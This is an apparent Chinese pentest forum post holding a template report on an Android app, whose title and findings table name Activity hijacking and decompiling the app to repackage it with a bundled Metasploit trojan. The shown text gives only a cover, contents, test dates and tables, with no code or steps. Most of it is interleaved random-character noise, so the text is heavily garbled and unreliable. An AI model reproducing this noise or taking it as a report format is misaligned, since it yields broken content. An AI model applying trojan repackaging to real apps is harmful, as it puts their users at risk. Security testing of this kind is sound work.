找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创-app客户端渗透测试报告之反编译捆绑msf马二次打包 ...
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 4162|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
& n# \8 ^6 r; c$ w0 w% ~/ h9 i$ d9 E$ l1 Y

4 x( s" K: d( j$ x2 N 3 `8 X, a V [& b8 d
. p( @) E, L3 S$ U0 ~' l5 U * k% w# Y' a Y) b- A2 [. B

1 \0 D* @) m1 F5 T1 I" K3 J) i; u % H, r7 O% @/ ?, t$ Q n2 @
& i# }: |% S9 a) W, W( A% J$ ^! ^# D- P

3 G) I$ C1 |3 A. T% G" l5 J# y, R) B% L3 N& s( e+ `) d! }( v- Q! _8 W 文档编号:                b5 V/ _4 H8 b1 t, m% S4 ?- d" M2 ^, F+ g5 H. `

! D/ H* g4 t* Y1 P1 ` % o" W* l& Q, G, ?; t& M, _8 ]

0 R/ t* N" f) `2 b8 F5 F % p1 O& I* h. b# p9 z$ N   ( o: u+ l3 ] P, f0 f : b/ P# l0 b9 U4 K

! U- J D. G+ }6 o8 i 9 D }; a! I! b) {5 g% p' u4 y# i# Q

0 Y9 U2 l: |4 }" Z" c! v! p. E2 ^ & Y2 W" m, {& |! P; d3 r1 M' m   : q" s6 {1 P% c + ]3 L5 A! R; G8 s% {' `; D3 o, Z

" h- K: w4 }( a7 J+ k) | 1 N4 ` V7 R) r0 \

5 Q9 @& C+ \) C) x2 c+ F' S " [8 X# z7 _: Y, _$ g5 i* n   - B$ D" ~3 b3 P: M1 |" D% A: `4 h( I! R ^# L) E1 t& {8 h- L

( E' v0 s' V& s1 B ( F( D3 k( ^+ D! u8 F1 e: m# i. z

2 J5 y P9 N9 j& @% h8 }! z6 _$ e. ]   5 v$ b, }5 l5 H3 Y' r1 J9 y( u4 \ K 8 C0 u8 w. b6 F$ S

. G2 q* }& k- t7 E % A: c6 h3 i+ X' `3 i

8 f6 ]1 l5 e) Y1 J0 d2 d % h* c& P. x( b7 O, H. v   # ~+ G: Y; r, O8 V+ `0 Y' q/ [& b/ L + ], |5 ^& g+ i9 k

4 G. [! k0 D" `0 Q/ d" ] # ?" |- A7 z! F+ ~0 f

6 y" B. F: K" F: Y 5 K% {- T5 P) Y& ~& b- O. ]2 c 某某某APP渗透测试 3 \' Z' i) m; r4 Q+ h( ^& I ! I0 Q) |! g5 q; j; z8 H- U/ z

- S+ g, x2 V4 J, |4 J4 u4 a5 h( ~8 A" ~( x* m1 A

1 L* w, r1 W$ [( I2 U; ? 7 \4 N( b+ h, @7 S' X7 O. E   5 k- i* l4 j2 I 8 x/ J' F5 L: G- {/ v

" k* `7 s1 @, ] 3 q- { K1 o) y- g% }

; z% a* E. w. m- w 0 Z9 C* e& m$ z+ n, u4 P" y8 E6 S   4 w; r. I/ f9 l6 g1 b; F# n/ f6 |- R* y. o

1 ^5 s! y, Z5 J0 s' y/ y) K {4 U l

0 G4 `; u4 |) X. P* T2 U0 Y * u" S! \8 n' v% B4 ~   3 r/ ? @% O2 k( @9 F# @+ t. @& l9 Y9 B( [

1 O9 b1 i- c+ Y * `8 m+ p& B4 N( V5 q

) D% L& u* t( p9 X; n/ i) ]6 m/ Q: G7 k( J0 c+ j% e0 ]( d   : D) c" B% v8 C P4 Z% E - Y$ C; \4 S6 q6 z: n

: M! E4 {/ q* I; z5 x& g0 X, c/ A2 k- O1 z4 l. \; {+ T& }' }

, ]+ ]2 h, X2 E. T : i3 Z2 h1 f' ]5 K 技 术 报 告 w. c' B* {) o/ ]4 J + y/ p* u2 q; B

9 n& m Q. W9 @7 d1 q% V( b' _8 c1 O8 D- f# W

. k& Y+ `! @5 }7 [1 M. q9 p1 G5 U J. s5 r   8 l: f% d2 E: B- M" V' B ^ % G& C: q( O( g/ x

. O& f5 I+ ]- @ e+ w; l9 ], u& P1 |' Y6 M9 {1 r

( p$ b' c; u9 T$ }; } t p- n4 i$ Q% ?( [4 F! m# f   ' t; V4 T" o1 y3 X) l; \ p! d d( D. `

- S+ h, U- i# m% @3 ?$ A5 Y" N2 F: d

. f. m! X- w* `7 c9 j& ]# y9 c+ x: [+ g# A: w$ s- }   0 q/ A/ u/ A" `' h7 k 0 z m6 J' |% }, a# g: H

7 Z- [$ d+ S2 i5 L; h/ {: D. A8 j; M" } 7 F- r p) C6 l5 |6 W; b" e' ~

# Y* e: [" M; E- i : s0 X& o8 o; w- r8 V' k/ J   1 E2 o8 v1 S! p/ H; x! p6 {, U& ]1 K* v7 i9 ], m; t

, B9 q8 a) Y4 M8 k" g * C4 t" ]/ L) k! D; A0 ^3 Y

+ z7 D: P7 m! X' \" \$ s3 W & [( Q& x& ?& B1 k, h   9 g# f* P" t) M/ d+ A $ r. A X, X) [) x! d

: f: N$ r2 J: Z& ` & d& ?$ L, g. H) `+ I: ]

* W3 ?% E% p7 H) v) |' Y ! Q2 A6 {- a o/ y! c4 f/ y8 F5 a   5 m: S4 b- C1 s" E, w: Q+ B + X3 N+ X: Q. B- \. V: @6 K+ f( Q

4 T! B6 [ c2 K! Z# S 9 X6 q# r* b4 V z0 o8 C. G

/ v1 q1 _: ?7 Y5 i" ~: l# S % [; n2 @$ W N   |. t0 W! {. H' J# c$ a 5 e7 Q9 y7 F4 C5 ]" V

: v4 L$ r. \3 Z 5 ^8 H5 r) u$ A7 D* [

+ i9 C+ i5 T. L6 ~9 Q( C) J0 l, x! G# m   ; h0 C. d; `* w% F 1 h4 b/ p3 x0 R- l/ u

% k1 R" X3 S3 ^& @7 L 3 A6 F3 F9 J! `3 r0 J u

4 H1 D/ j# d5 ]) X% E 5 |1 h; l8 f) S2 d   9 d4 ^0 `, `' \ l; D' o' h; d8 Q" J. ? ( J' ^9 M) _1 u% f% z- }5 o

/ \# Q# {8 G, q- R6 X+ t4 @* a( }0 v4 ?: }! A, {

& F2 e+ h( Q' E/ Y" C8 X+ V! G 2 B8 C+ o& d }. y, p- y   % t& d% a. V, \) p5 ? 2 x' h" M0 e- Y

/ `" e1 H6 K h, o $ j* T" a) J) r! l' T, {1 T

1 W1 v, B1 w v3 V' {* F2 ~ {/ _6 }8 o$ m6 G   4 d! W2 W0 F2 R& t5 |) G2 u 5 ?1 \3 A7 B% `6 m5 G% q+ k0 k% |/ o0 g" e

9 G9 S! @9 v1 g, h. g, g+ E G, { 5 m9 R0 V8 t* K

: S3 j% {5 N- n. |* F- k1 n1 Y0 E 3 F' I \& F' E   4 Y8 v% |+ V/ I, { _' Y) c8 w) O# r; b, B7 V7 N

% }. x+ n, a$ f , U* K, d# e5 ?- z

, B) F" B D1 u l8 f 7 g7 x4 b3 H3 J# x/ w0 D   3 s- ?; ?+ b5 U) N. w! \( J 5 `$ S6 Z0 p$ j# @- l# a$ V

6 G- i3 x6 P& g4 D: q6 j6 _# F % X6 }& `1 a2 @) s: u9 N) ~; I

2 Z) L7 y/ @8 a1 @ / p' w/ p( G8 z2 ^( S3 `   " K; d1 |' U/ ]% ?) R* r' M" _6 O, I, _$ n0 y: F

( i5 `; e4 ^* ]9 H 5 F) h# @! j4 {: {$ Q

2 e$ [7 E* \. G. ?3 {2 j2 f! x7 u- C0 M8 I   . C x) U- ~. A$ E& b 8 y: D* p2 y0 |0 [$ |

; m3 P* n& j' S% u3 b & F. \$ o+ n- {2 m/ n

6 [. ?- g$ U G, U- c0 | G7 x) e9 g+ J1 I- }, l   % L7 o- L2 _/ }) |, T5 }! X+ ^ " p8 n9 N9 _4 s

2 x3 _* f i$ H- Q3 i6 X. n9 O6 m 6 _7 N! e$ T5 ^, t, F! m

. }( ]( @6 B$ A, `! v: F9 e" v! j: c* h1 e& n3 J$ ?   8 u- ?/ z9 s) i+ P - V. C8 Q, M' I: R

4 u, G p& g( V/ d% }2 R% Y / }) o2 n) e& S* _

' o$ i+ R1 y6 J! z( T* z! b : E' U6 _. m) W3 c; R8 D# y: C0 |   0 N; J9 `) ?) X; M0 `* R % P* k! ~6 U6 }6 T' P6 K

. ]: O: a! c* G+ l1 m+ M/ t$ K6 b5 {3 A ! z& y. N" @* g( v* y. Y# }5 X# O! l

& P9 N# S3 A9 K! o / ]/ F+ H, \8 q3 h5 X 二〇二〇年 6 j+ u9 j: @0 y3 _ / T6 s! U4 G$ w* P

2 E) k- W/ ^. _' b' |; r* O" l
2 |$ l, j5 W9 {1 y& x; U" q+ Y- W9 [0 F4 S: }; f9 t5 \# j" ?8 O6 ]. E
3 y9 v& V8 J, M% P+ B 3 F$ n- y, F3 [1 Q 6 N7 u$ D+ q5 {2 Z( ?9 w3 u' n$ @% `' @9 W6 k* f
& g% q7 G3 L6 A6 |, y: ]; ]$ V " X }! w1 U2 U" A
+ R; Y ^( P: F' Y* N, }# S P# `# |) l2 Q, N8 ?1 v
2 q& [; e6 N) I' d+ \* | P7 i+ U) }0 K# H& @4 R , a+ C4 D) o* F3 f: P - G; {- n6 z2 j* H% v
; k+ X+ P2 c) ^" c7 `" c 1 t* ]7 Y6 T( q' f! M% J

) G8 I3 h/ z9 U/ }. |# t1 N! n + q3 _: J. ^7 y- W" _ r" x* b 目 录 ' ] \" Q, [9 ^' X* O8 B 3 Z" L1 p1 K- Z: G4 a! m5 o, ^

. V% c$ _7 Q+ Y7 I " V% o% ?6 t, r- f ! L& M; u; t. m, T . @( j* o/ l/ I8 ?6 N

4 q% G+ f, Y. E! ], O4 h j- m; Y# ?   7 Z+ S2 P* l4 y( ]4 y , L/ A6 o' J, }" q, z9 |) u

[2 ^0 g1 Z+ L$ O2 Y0 \( y y, _6 z

: U" l4 ]2 e: T; D, H6 E: c+ q( U5 E) v3 {1 O' l 1 概述... 3 ; {* W9 ~ F0 ~" O8 M+ C& s7 t/ f! Y: P+ K

* c/ @7 a0 g& l* z 6 x: B+ |7 K& |. K

- l8 g. ]) x X4 _6 e) L/ u2 u# w; O/ o 1.2测试时间... 3 * S6 Q" g) i" t. r* ]4 S' ` ; g3 P. S5 t( @$ O

/ r/ k7 m' @+ ~1 m7 E; h/ \0 G) p/ j' |7 m

5 h: X' I9 h7 S# T- J" p0 B; L- J' _$ a# H% V 1.3测试对象... 3 1 J5 s3 U' }$ t) e7 {+ a 7 I9 q0 o6 I# ?& k4 ^# s$ a

+ ^/ D9 i- O+ X9 L* \; d + W+ [' {3 ]/ \! k' E6 v }/ S

f* G. P+ c% g0 h7 [" L0 t 9 g( P# M$ B- W. h 1.4测试结果... 3 * H/ |( U+ y5 o: C% A # W4 H% D! I/ c- |, l4 u$ {8 F$ a

# { @. Y+ d0 E g" @& Q% x7 k1 V7 U. p

7 P% g( Q6 X. }& l 8 [' ?$ W* p+ M( O 2 检测结果... 4 ! T3 K9 b! @* p5 K, c) r& f 8 r0 y" G3 Z5 l# F: Q P# B3 q8 ?/ ~

. X+ |; e, C/ |: h$ T/ F ( b: p5 m0 k0 M$ p

9 s% m( D2 F% u / Y- d( m) L7 B- L0 Q 2.1 某某某... 4 % t* i( z2 v9 S- S! B) {; u( X' D1 ?' Q

! d* }- i: d9 q. N2 |' b4 n R( s+ H+ c6 q

- i+ J( r2 y. ^! l$ Y7 d# _ + k9 F( D: |/ u- M6 D$ z 2.1.1检测目标... 4 7 s! O* _5 K9 k1 |2 j 0 u c u! x8 d8 `! q

/ Y; g/ r1 {0 Z: k- I# ]# `% M1 N F# Y7 }

. J& C0 h J, X& f$ T& D$ | % k8 S7 i$ G3 F( p( p. l 2.1.2检测结果... 4 6 e$ ^% D/ v: U5 G7 b: t4 P ?3 q& `% [3 ?! `& w. w0 ]. h1 i

_& ]1 Z( d/ F* n 1 v9 n% ?* t. S- w& D

1 ~% r( L, w- K. o Q. c' K 3 _- j4 i: q! ? N2 X8 c. Z 2.1.2.1. 4 / g$ {$ I$ V' g! R: O4 l r4 h 3 y- H5 v" `+ M J; L

2 {$ |' c" ?, b- O. i0 C4 T# P4 A* V7 R4 L# O# k% Z/ V9 `# _! u

: A. k4 R6 m9 A0 `1 p# h ! F X z8 X% a! ? 2.1.2.2. 6 0 r+ _) [/ U- q$ C- C8 V / J7 P8 j) D, C) Z9 j8 q" s

& A3 K! i/ E$ Q7 B; W8 J; [+ T ! D. ^# ]6 l$ j6 G1 v4 [9 v$ M

5 Q) }' {" i% z1 S( R, G 7 x# b6 x! s6 j9 w, D a. {0 a1 | : v0 ` G! ^' K6 T ) r) |2 W5 `# ?3 Y4 z6 B! e

1 q. i: p" z3 M) J- Y- A6 U7 m" Y( \6 e: \8 Z ; t4 q' j# k+ K; @9 \3 B: T ' K( l1 w+ | x, ]2 l. ~
) O# ^8 u( X) `) O ; g7 j3 Y4 l4 d- d* E% _* t& w; s
# ?5 W- w' Z0 X; p) G% i2 ^9 N& o! X8 [* R- {3 l 7 ` \% F, m& n. i1 ?7 I( ] ) w. A2 R3 ^& r1 a: G% S

) t( q: A+ V. j" O 2 j; k: h: ?9 g4 B2 V 1 概述 $ w% x3 I( F* V- h % g4 G# E J; i( u! L7 C3 B

1 ^" e, u" l1 W! Q d/ E9 k% c 5 y/ y6 |% A) {6 N, d0 N+ }

$ s, p! E3 ~* j% r - m* H: {$ r, E; h 1.2测试时间 6 {; ]/ U# z* W) @3 ^; p* G% ~4 G6 A( W7 h# T. m$ d- Y

, X, ]4 a2 m* T8 M8 Z * S8 N5 Z9 a* q- {+ z- z/ j3 [ % K2 S0 O* F/ m! Z4 E2 I! W* c8 R. O. K7 \3 b( D6 D3 k4 |( b9 z- K5 y$ ]" Y9 X; a5 i; J2 L# w- x+ a; ]8 _( R: [1 f0 ]: m6 k3 B" P' F g7 O6 W# T& O2 c1 F/ l: Y" H% t: L, }+ u1 c' }9 A5 s6 L) a0 `/ z0 ^4 |6 w& Q6 Q: q9 U* c) E) D8 }0 G+ C' V+ r1 U; l' X' k, \+ B3 {" b( \, V) A0 \3 y" ~3 F- U7 V, R+ y& p5 c6 q: e* G1 P& |8 ~& w4 d9 r8 K. P1 R/ z2 a7 o, N B7 l+ I3 |& R3 g x4 a/ l& j& u0 U, x7 B- m0 L8 I4 P9 S4 I& k7 Z' K5 P" w% [, P8 }) D+ x# y, A9 Z7 F; |8 Z* v% G3 h0 g; W) A i. l5 V" l" |& V. D. `3 i, v0 H1 W# A$ Y4 v$ n5 |* d' B3 r6 q2 z% g6 X5 F. A) R4 p5 Y# G7 X, }- F" E! I% O8 ~* J" v# M9 y& N4 I- ^! f! u
" n6 ?8 f6 d. t2 F/ ~4 M5 m; t( W/ ? ' k8 z. {8 Q) o

9 M% w9 I" R& R" ^- Y 2 B5 C" K9 O. R 渗透测试时间 * H/ M2 {* Z) P: Y+ h: p 1 E% |# M- Z4 A4 Y. u

) N9 w7 N8 }% } 6 @' t; }! ^! h5 _
( K3 L ^ S0 m8 E8 f( w- G) F : V6 k5 s0 h% U& x( t& V! {

- _+ z* E5 m% V ! P3 `- d% }& `4 C3 n" X' |- _! J 起始时间 " }& N# L4 E4 F! E& U; \6 Q8 r. i {+ A, B# \0 d- `

2 k- D9 q& A' n0 h3 t4 y+ L + Z6 i$ G/ g7 O( q" {$ m+ p1 m. F 		) B# y [1 W8 v! |8 _8 r$ V* F. ~2 O: _9 Q

0 ?! N' A. Z, s: I6 ^4 Z ) w, ^$ S! ]3 R! X$ {7 B 202046 1 R( Z) o6 w2 w4 ~& |5 ^ % j3 z, d/ w! E

0 W0 k; f- z" w0 j4 ]0 ?+ u ' v4 T1 m( x' q3 e9 i
1 l8 K m! [6 W7 n3 c8 e/ x+ K* J" m" |' Y/ o7 ~. b

, D1 L s1 H. m+ b* A: c; W 2 v4 ^9 f) a! q; k4 Z2 t- \ 结束时间 - O# a& @- u; c& ]4 ] 7 q: Q' J9 o/ N1 J

; C7 Y% P9 n0 k6 c+ e4 r ) e, y. B. c: n 		- O- T y0 j+ S' k , w7 k- W5 ^7 G2 c! ?

6 }1 q% s C$ q8 L3 y1 E+ C ( O5 e4 j0 [4 b% y- p 202049 5 A( O8 ~" ~; O, g " M% C) e# L3 J: }% t# s# V

6 I. S' ^# o& _: {4 }/ L5 f 8 J0 @1 v l( ~; L0 q/ J5 w
' t j1 P* |- N s* U( V' }$ C: p i; {2 [+ |+ _& O0 C( W

+ }6 ?8 G+ A. s( _8 W. Y9 G& w Y9 N" o 1.3测试对象 6 \! ~$ e# X- a& K* q" ` * v# W i& V" N

5 m0 D5 Q& @( x: ? ) K- n6 L F9 Z7 u

) h" r) y* _2 [4 p ! P& r D; y( n$ E 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: , J2 H% @! m. L5 Y$ g. c0 B) ` 2 [: [& t$ S/ {! ^ I3 I" X

1 O$ p# s, ?- h, y" Z ' x( g) Z( C5 z

2 P9 H# E! k# i3 Z; W - E" [- \7 }* I8 U( y 1-1 检测对象 " \6 C: B Z/ v : @5 `' l. W5 ]( l7 V; x

5 L7 ?& n" ^$ z9 U( j( N* ^* T& G& P; [. | # e5 y, _2 ~& A( R4 Q" q( }3 G& \) Q: { f7 o. p! W( N! C1 W! H5 i5 @6 V& m! O3 U7 z1 F a( }- D9 T3 ?6 r- n) u& A! ^! n9 a# N" b$ {* L5 G0 ~! i' E& _' u. F2 r2 k! m# b& E1 R, a% C2 i! [1 N7 {9 n/ [4 H N; `! t* r P0 v; K7 Y, `6 I- n3 I; y2 i4 J! u* L4 }( A$ J! Z: `/ r9 r/ m" ~% a& V4 T9 w* N | ~$ Z! O! I; w# D) ~) c) P! Y$ M9 @8 { P& {4 g2 c3 }4 Z: K7 Q( s: ?! G, E( \9 J# a$ Z( u9 y+ s1 ?6 |* K; ~- D$ u! s* j b% o6 }" k- M/ |1 L9 O( x/ T! E: O! s0 s* x+ |: T' c* n& g# u7 T5 f3 j U6 c4 ~6 q- ? A$ L4 e4 _6 d9 C# J1 P3 ~" J6 ?5 c0 f5 t. n! Z2 L3 l5 x' ^* E& e$ n; c: v9 `; a9 V. ]' T9 T; N) B3 E9 @9 g' E' b. p) D+ g/ P; @0 D) ` l8 G, n/ [( r" z. g, ]5 m4 h0 ]- D6 p. V& t( d
+ ~, {7 ~# P, H" w4 y) |' ^" i0 F 3 n: p. Z0 f3 T7 G" F( j

' |5 r4 p9 T0 {" o 4 z# @! o6 s7 I, ? 序号 % l- A% ?( H: L# U ) y" D W4 `+ |7 t; n

! v$ u# @9 z" q; w" X( o/ a- j) W1 {- p m* K4 v 		* l% [- C5 q7 Y% X : A9 m! y4 P# m6 Z' v8 }

, q4 |/ ]( J0 h& _" x4 M: I& ?/ a" C% D4 A 测试对象 # H7 _+ G9 D s# D7 n8 Q , {8 m0 }9 D& k7 i. v2 f

$ A$ L* v1 d* S" s b7 i5 L( a+ T+ s2 I, R9 ?" n 		# r; [* L" J$ Y" o3 N+ T* P& |7 @( E1 `) y. [( t

2 }) `5 @( |% P3 o6 N 5 g) \3 q; i+ f8 b8 a 测试地址 & f% C7 U9 Y9 a o8 n2 |* V3 _ ( O: @. G I+ Y

' D/ U& H3 \0 }0 p) G& O7 `. O. M4 l5 x2 D& t z# `2 t 		1 T) r2 F# n2 `( D3 N# f ( \2 z9 }* [- x5 f8 A0 H" D- w

9 R# U4 U( r* o1 d3 j/ l5 k4 @2 }5 W2 r) P3 W c 安全漏洞 ; c0 ?5 J# K" _# \: R : I. M# D4 E G6 h

' p6 [; c2 i3 v 7 s+ ^' C' N# N' d `+ U/ ]
" [" m( t) d) S5 P: c 3 z7 H, y0 i; Y( |" n

" f2 |) L# }' V0 H% a 5 {6 o% L6 r+ J' k/ |. b 1 * ^2 m1 O+ j8 s% ^( P( ~! s. i( N% F5 N m% m2 V. N; U

' X5 h. m- i+ p4 g 5 U' R+ A1 S- c- y- Q, z: [ 		, Y( z+ ^% O' r( \# B * a5 s# E( x3 m7 t: G! @* V( W

Q# K1 o4 K( O5 T4 s$ H+ L# b" D6 @. @5 e B 某某某安卓APP $ h7 C! t7 p, C+ D # ?7 ~ g& {; L% L; D I- D

( f, I- k0 O* @ - R: S7 w, y2 |: M$ s0 v" }! A, Y 		* T [& h4 `& G! M* O, W: A& L/ E+ U- H( f

0 u Q) b4 D; H, l 9 w5 Z- V( x; k8 e# {8 I   , q& b2 v, P5 }6 \7 p" O5 U( _! W" q( c k- r, Y

* N, A F6 |/ M3 U0 u 9 ^3 S5 }; W( _; a0 r5 {0 a/ \ 		: h2 \2 `% _) p ; k' {! j4 y; Y7 W

& j7 b' j3 s1 R! H7 u9 E) ^ 7 W7 d @6 F" v 2 ( \' f) j$ ]6 ?: | 9 s, [& a- q- l# R

4 G& g; I7 H3 i L( a4 S% r/ M+ x! R+ {9 c& r' J! ]# W' u4 W6 N) [
7 W, k3 n5 v1 j, X1 U$ K 4 z0 w1 l! M# {8 t1 a3 {' j

) @9 A4 n5 O! H! {) S& f + i/ E, A$ d% G) h' a8 a 1.4测试结果 [- s8 J' ]% s" [" D 4 G, ^. J: `- H0 I9 m

1 I. x; w9 v, K1 f( z5 I8 o" J ( X; s$ }- B9 }$ W$ e

6 Z" s+ V! A# e/ ^* L" z8 ]+ F$ |% d 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: # x; F! D6 C9 }, B# x" g q! Y- k3 ?, G 9 t/ e0 ]8 ]6 d6 d$ O r

6 w# R/ M* ~! \% r8 ]& f8 @8 O" O) G/ W

) ]1 X8 L& ~" p% t; M# f & ?) |/ c5 O1 Y   . k7 {. `5 z+ S! x' M 4 Q/ @2 D7 H8 R' T J- b1 n

+ T# j5 [: b$ w0 S ' e0 b0 {3 Z# h7 W4 v0 \( {, u
8 S& Z2 T0 i- U! u ] \2 ?( l& O9 p, c- y 7 v- h. k H5 Q/ O2 {; B7 T/ L& k5 [' i' R% i5 n- s7 I& z! [3 J, c& D s; h& Y9 Z+ w" P. @9 F$ i2 @" U. m; r5 w z$ m( u9 N4 \6 x( C3 O2 R+ P& O6 D5 u% J; e3 G) o" a- @* v: F9 A8 B1 b% K1 U2 m+ ^- s; g" p9 T& g- {4 b, `. X6 o2 y7 }" P. k8 H: B" S, ^6 R8 A3 g4 ?7 u8 ? U) a" `7 H/ I8 b' q0 N" N$ U# d6 m, ` G- {( `; |* u b/ B+ m8 n! }: A- W$ j5 R: L% S6 p$ E( |0 ^/ Y' h! k( l4 L' X; b7 {7 P0 _4 M+ |, b+ g9 b6 G. d, [' k8 n! j$ B: e& @; R( ]( r6 R1 @* T3 Q! J+ t8 r8 {! i" p O: G( ]9 O3 D+ U, F& n- A) @$ K8 m4 k' F& k9 A$ L$ U1 |. w. \: x7 z5 A0 \. A4 G* }3 p6 Y/ B5 z3 o8 F$ s* G: Y1 a3 ]! `, A3 p/ V* ~% `/ F$ N. J `1 F: ?' y- u" }! K+ D" Z7 m4 P/ I4 x; |; H3 F/ c) q! W9 C+ M) M0 Q h4 a- i( }. L8 X3 R% h) q/ g# z7 n" R& Q" I" n" i( F5 j( V: ^/ m8 b8 b e2 x0 y0 P" b7 W H7 H: _, y' a( ]& T i9 O$ T! R3 _4 h# Z9 O$ F s! [& z) s# A- a# [8 g8 B. t# \5 O b8 B7 R1 X# ^1 d" _9 C# S( o- Q; E( D$ b2 z7 K. x- T) S7 n x; I/ U0 p N4 w) |' G3 e( x$ j+ \7 o$ S& l+ T9 [; _9 v3 o2 |. v0 N R. T+ E/ S [! D7 x1 J( |+ n$ S+ z2 n9 `; u4 t( N) ?1 R& S6 y3 q J* a; x" G. b) E7 n- J- B4 c! h1 j) H1 ^8 e. P" B1 P2 ~6 H, Q9 n/ I# n; o' m; e. s
( D! Q( P% a* C) k: ^ 5 B: y7 X( p1 n) u# X+ y6 y

6 E' m+ q8 u2 T! k / }0 Y; x: |0 n 序号 5 m4 e) n7 N& P0 F ! l: F( O4 j( s! ]% D* g/ l

( P3 v s# B4 C' o/ |, Z$ i1 W ) h8 V2 N9 n" C% O 		: t# `4 Q2 p# W) Z# v- ^ 1 \3 J/ @' V3 L, z

4 T2 O# o/ r2 D1 W; d: A1 w* q + g2 f1 I7 ]3 T( S; K: k 系统名称 ; W) @7 ^) G: g2 j7 m : d7 p% Y3 b% S, A9 J9 ~- {

B3 Z* s# }: o T0 M / C; U% k: e& k( |7 j( C2 w8 z 		+ X+ m8 t; Q" { & J- n* y6 z. k

% B! m8 L4 e, ~% A ; u4 D/ E0 }# v 漏洞名称 " j9 `* Y4 t3 b% _8 W 1 `7 {* D* j8 V4 _0 G

: E& G. s6 S- D' I' n, J/ i( C; B u& S6 I& h0 A1 o" l, p% v4 j 		% @+ F3 S0 M3 R + U/ ^4 k" R& E* A0 a

4 B6 ^) W8 @) C* w" Y! |8 x . r* H5 E. z# X x- [ 漏洞危害 9 u, v) |1 W4 D* ? 7 |( H' t' \. L5 ` O. Y) }

C4 V. z8 c5 X c& _: c! f! f ~, s0 j0 H& [- b. E 		( w; e y7 p) j8 b- g4 m* f 9 B0 b6 Y: n6 U' F5 u) `

0 y. w0 K ^# r6 I* e {9 F3 _( t9 K& l6 ^; m; |9 V 修复结果 ) p& m4 \! r: r/ m2 ^6 X $ }1 f: I# P7 |- `( U9 q

" c i5 b, h; l1 F+ T, c 1 L( w, P- q$ Q$ W1 e3 L
# C- y, T3 f* R# O; f % u c% d9 O5 F: z S( F

$ w" N, u8 s4 u% Z2 F 5 H* C. t3 {' T& G8 z 1 $ X0 h5 Q: }/ J0 s) [/ A - P6 }3 I/ I5 l2 q. f9 v

( S: o1 Y/ [) F8 X ~2 A 2 b5 c& y9 ?8 D: S6 [ 		' u9 d! N. [7 g- K2 {2 {( c/ ] 7 z7 p. M6 T" C! K: q! Q

6 _3 }) _2 Q: V, | , I8 \- c; Y S 某某某某某某APP 2 Y9 O' H& `. g/ p! }, I5 T" W2 X5 ^' Q# z# }: h& m

2 S* z* L6 W. M' Z: [2 H4 v4 R! u4 V 		3 m* |. j0 M. I7 m$ [ ( j) Y& E" f$ b5 G5 w5 h; {

. D; c. y4 Y0 I( x9 ^+ M- N, _- g5 f6 O, G$ S Activity 劫持 8 ~$ k; X2 J+ A& u 5 p+ C1 a+ F4 Z7 U

# b& t0 c4 E* m2 m h- e : H" C' t* \0 } G R& M

% x/ _' S2 S i + F* ?3 ^5 I) b/ q   4 C$ v% ^" Q. B4 b7 e $ W) X8 m+ a+ t6 S) d

) G% Q6 p( m% \4 w, l X 2 t! p f, z% b8 p0 [2 y8 @ 		& [9 E9 @+ t) R4 t2 R 4 i( M$ ?* h, Q0 ?+ ~( B

; c7 |/ D+ P# W5 J d * f- f" l7 W6 E$ u5 F1 ^ : t! ~$ k, w7 S+ D5 \& d9 X% S* y" `: d

# d9 X" L/ x, I1 }: u, Z' L) p- m & v$ q/ M) V- V 		5 T t. x; `4 |1 H6 U4 }7 f$ Y: s9 a) ? ( l! s1 y$ ] A9 P% y

" O" l# G% S: {: S! A b2 q% ~ - i- ]: {& r& {! G9 \) j% t2 S! H* {   ! c+ A2 q/ p( |$ N) Q: w / s! _' t9 y- _5 E

/ o! s [9 A7 c8 Q( M 8 @5 |; l' v" P
, _4 |, I" ]( [1 N( ~: X* I ; o0 z4 u% H+ S% Q) I$ v8 X; ]9 m

9 ?0 o$ z; a- O& V0 y" n l" c3 R5 L) `8 y1 {5 R 2 / ~9 z5 e% y7 F- N E1 B9 ^$ C 3 b& @+ @3 a+ \4 Q+ E

2 q; z: |% p4 w5 ~4 c) R; _6 D& B+ j & y i' x0 ]# H/ T 		r" L8 c7 N& r( p. P0 p+ W, i c5 V) M% e

5 ~) ]+ N% q! W3 N# z / R0 v) Q k. `! y9 `" t3 v 某某某某某某APP : c( M5 ?, |: W* b6 m9 i) v ( c5 c5 {2 ~" S4 n7 |, @

' f2 W1 d/ Y1 l9 z 6 ?9 C- `3 B4 ]& b# V3 F 		( t$ `. b& t+ j $ `" _2 T$ j& ?7 F- ?

7 N! `2 @! u$ l5 u1 I& Y0 Y5 ?% |0 T ( w t( ]% K" v* C% y6 l 反编译二次打包捆绑木马、篡改APP代码 ; X) i2 j6 |4 }* m, N+ O. c u/ V, g8 n' U

0 q9 }9 G$ B: O" o4 }# Z1 _* v% T 9 x% m1 ?# y# Q2 J& }1 T+ A 		8 n1 n, ?, u+ B8 H ; e/ A; U9 K5 w5 ~

1 m+ u4 c% X% v/ d( v$ \ ) o6 X7 _+ K7 A; R 9 j1 Y$ o- A& d+ A, f 4 P% o- p0 G; g/ S: c/ D4 _' q6 I- I

) F+ p+ Q" e5 D4 k9 ^* ? 7 O! V. L. B8 i, Y( p 		$ ~& O9 k' T4 t4 R9 p( ^ 8 i0 _% C( N* D0 \0 T( M& v

- d: i: D8 N9 N% \* d" j- i) D 6 y. e. r1 v8 F1 ]4 | L5 Y   0 R0 P& E1 A* @% e/ `) l & ?; O+ w# H9 K4 ^& @- t: h8 O/ \

6 P) L( H" s& L2 ^% s4 q 1 ? {8 f* N$ y5 ]+ Y
( v' R6 t5 p4 K2 M5 L1 w5 ?% e' y; |; g
4 [0 N- Y. V' v2 l( B) Q% P: `( @ 9 e- q6 v Z' H2 Z& ]+ A$ V. U. u/ }

* L" D, R) l% r. Z) ~' J: u o; S; x   : C/ w0 D) Q0 Q( a& `2 y 9 E: n& a1 c: B

+ j/ I7 i' z- ~ . F+ S# j7 n8 o

8 T, N# k$ ~( ?& Y% W4 ~4 X% {6 M" o , I7 F* Y4 v* y" s T( a5 H 1-2 测试结果 , }8 x0 z0 J8 M2 B3 {- f) k I+ D1 N: \4 {& z+ _& {! ~

